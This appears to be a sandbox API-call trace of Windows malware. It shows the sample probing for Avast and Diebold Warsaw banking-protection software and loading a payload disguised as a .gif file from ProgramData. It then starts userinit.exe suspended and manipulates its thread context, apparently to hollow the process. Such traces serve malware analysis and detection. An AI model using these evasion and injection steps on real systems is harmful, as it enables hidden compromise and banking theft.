[0127.543] SetThreadContext (hThread=0x108, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdd000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8fee8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0127.543] ResumeThread (hThread=0x108) returned 0x1
[0127.543] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0127.543] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0127.543] GlobalUnlock (hMem=0x189000c) returned 0
[0127.543] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0127.543] GlobalUnlock (hMem=0x1890004) returned 0
[0127.549] Sleep (dwMilliseconds=0xe74e)
[0137.554] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0137.555] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0137.555] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0137.555] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0137.555] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110
[0137.555] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0137.555] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0137.555] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0137.555] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0137.557] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0137.557] ReadFile (in: hFile=0x110, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0137.561] CloseHandle (hObject=0x110) returned 1
[0137.561] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.562] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.562] GlobalUnlock (hMem=0x189000c) returned 0
[0137.562] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0137.562] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.563] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.563] GlobalUnlock (hMem=0x189000c) returned 0
[0137.563] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0137.563] GlobalLock (hMem=0x189000c) returned 0x25f110
[0137.564] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0137.564] GlobalUnlock (hMem=0x189000c) returned 0
[0137.564] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0137.564] GlobalLock (hMem=0x189000c) returned 0x265120
[0137.565] GlobalHandle (pMem=0x265120) returned 0x189000c
[0137.565] GlobalUnlock (hMem=0x189000c) returned 0
[0137.565] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0137.565] GlobalLock (hMem=0x189000c) returned 0x265120
[0137.566] GlobalHandle (pMem=0x265120) returned 0x189000c
[0137.566] GlobalUnlock (hMem=0x189000c) returned 0
[0137.566] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0137.566] GlobalLock (hMem=0x189000c) returned 0x26f130
[0137.567] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0137.567] GlobalUnlock (hMem=0x189000c) returned 0
[0137.567] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0137.567] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.568] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.568] GlobalUnlock (hMem=0x189000c) returned 0
[0137.568] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0137.568] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.569] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.569] GlobalUnlock (hMem=0x189000c) returned 0
[0137.569] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0137.569] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.569] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.569] GlobalUnlock (hMem=0x189000c) returned 0
[0137.569] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0137.569] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.570] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.570] GlobalUnlock (hMem=0x189000c) returned 0
[0137.571] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0137.571] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.571] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.571] GlobalUnlock (hMem=0x189000c) returned 0
[0137.571] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0137.571] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.572] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.572] GlobalUnlock (hMem=0x189000c) returned 0
[0137.572] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0137.572] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.573] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.573] GlobalUnlock (hMem=0x189000c) returned 0
[0137.573] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0137.573] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.574] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.574] GlobalUnlock (hMem=0x189000c) returned 0
[0137.574] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0137.574] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.574] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.574] GlobalUnlock (hMem=0x189000c) returned 0
[0137.574] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0137.574] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.575] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.575] GlobalUnlock (hMem=0x189000c) returned 0
[0137.575] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0137.577] GlobalLock (hMem=0x189000c) returned 0x27b110
[0137.578] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0137.578] GlobalUnlock (hMem=0x189000c) returned 0
[0137.578] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0137.578] GlobalLock (hMem=0x189000c) returned 0x27b110
[0137.578] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0137.578] GlobalUnlock (hMem=0x189000c) returned 0
[0137.578] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0137.580] GlobalLock (hMem=0x189000c) returned 0x29f120
[0137.581] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0137.581] GlobalUnlock (hMem=0x189000c) returned 0
[0137.581] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0137.581] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.582] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.582] GlobalUnlock (hMem=0x189000c) returned 0
[0137.582] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0137.582] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.583] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.583] GlobalUnlock (hMem=0x189000c) returned 0
[0137.583] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0137.583] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.583] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.583] GlobalUnlock (hMem=0x189000c) returned 0
[0137.583] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0137.583] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.584] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.584] GlobalUnlock (hMem=0x189000c) returned 0
[0137.584] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0137.584] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.585] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.585] GlobalUnlock (hMem=0x189000c) returned 0
[0137.585] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0137.585] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.586] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.586] GlobalUnlock (hMem=0x189000c) returned 0
[0137.586] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0137.586] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.587] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.587] GlobalUnlock (hMem=0x189000c) returned 0
[0137.587] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0137.587] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.587] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.588] GlobalUnlock (hMem=0x189000c) returned 0
[0137.588] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0137.588] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.588] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.588] GlobalUnlock (hMem=0x189000c) returned 0
[0137.588] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0137.588] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.589] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.589] GlobalUnlock (hMem=0x189000c) returned 0
[0137.589] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0137.589] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.590] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.590] GlobalUnlock (hMem=0x189000c) returned 0
[0137.590] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0137.590] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.590] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.590] GlobalUnlock (hMem=0x189000c) returned 0
[0137.590] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0137.590] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.591] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.591] GlobalUnlock (hMem=0x189000c) returned 0
[0137.591] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0137.591] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.592] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.592] GlobalUnlock (hMem=0x189000c) returned 0
[0137.592] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0137.592] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.593] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.593] GlobalUnlock (hMem=0x189000c) returned 0
[0137.593] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0137.593] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.594] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.594] GlobalUnlock (hMem=0x189000c) returned 0
[0137.594] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0137.594] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.595] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.595] GlobalUnlock (hMem=0x189000c) returned 0
[0137.595] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0137.595] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.595] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.595] GlobalUnlock (hMem=0x189000c) returned 0
[0137.595] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0137.595] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.596] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.596] GlobalUnlock (hMem=0x189000c) returned 0
[0137.596] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0137.596] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.597] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.597] GlobalUnlock (hMem=0x189000c) returned 0
[0137.597] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0137.597] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.597] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.597] GlobalUnlock (hMem=0x189000c) returned 0
[0137.597] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0137.598] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.598] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.598] GlobalUnlock (hMem=0x189000c) returned 0
[0137.598] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0137.598] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.599] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.599] GlobalUnlock (hMem=0x189000c) returned 0
[0137.599] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0137.599] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.600] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.600] GlobalUnlock (hMem=0x189000c) returned 0
[0137.600] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0137.600] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.600] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.600] GlobalUnlock (hMem=0x189000c) returned 0
[0137.600] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0137.600] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.648] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.648] GlobalUnlock (hMem=0x189000c) returned 0
[0137.648] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0137.648] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.649] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0137.649] GlobalUnlock (hMem=0x189000c) returned 0
[0137.649] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0137.649] GlobalLock (hMem=0x189000c) returned 0x25b100
[0137.650] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x10c, hThread=0x110, dwProcessId=0x888, dwThreadId=0x8a0)) returned 1
[0137.652] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0137.652] GetThreadContext (in: hThread=0x110, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x202be9, Ebp=0x0, Eip=0x76f67098, 